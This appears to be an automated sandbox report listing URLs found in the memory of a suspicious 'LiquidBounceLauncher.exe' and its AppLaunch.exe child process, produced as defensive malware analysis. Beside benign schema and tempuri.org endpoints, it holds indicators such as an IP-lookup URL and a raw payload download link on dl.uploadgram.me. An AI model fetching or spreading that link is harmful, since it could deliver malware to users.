                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultL
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.r
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://service.real.com/realplayer/security/02062012_player/en/
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.a
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://support.apple.com/kb/HT203092
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24
                      Source: AppLaunch.exe, 00000004.00000002.356938745.0000000007799000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id24Response
                      Source: AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
                      Source: AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
                      Source: AppLaunch.exe, 00000004.00000002.355068961.0000000007091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/earth/explore/products/plugin.html
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355711541.00000000073D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355538295.0000000007326000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.interoperabilitybridges.com/wmp-extension-for-chrome
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: LiquidBounceLauncher.exe, LiquidBounceLauncher.exe, 00000000.00000000.263929326.00000000004B7000.00000004.00000001.01000000.00000003.sdmp, LiquidBounceLauncher.exe, 00000000.00000003.261371642.00000000007B2000.00000040.00001000.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.353313209.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: AppLaunch.exe, 00000004.00000002.356291916.0000000007616000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355525800.000000000731F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356056989.0000000007555000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358181456.00000000084D0000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355371895.0000000007281000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355865556.0000000007495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356235277.0000000007600000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.358403236.0000000008541000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.357633859.0000000008257000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355237303.00000000071D2000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355979406.000000000753F000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356471909.00000000076C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355428723.0000000007298000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: AppLaunch.exe, 00000004.00000002.356676996.0000000007757000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.uploadgram.me
                      Source: AppLaunch.exe, 00000004.00000002.356676996.0000000007757000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.355152654.0000000007121000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000004.00000002.356578561.00000000076D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.uploadgram.me/628a4c7f14fb9g?raw
                      Source: AppLaunch.exe, 00000004.00000002.356676996.0000000007757000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.uploadgram.me4
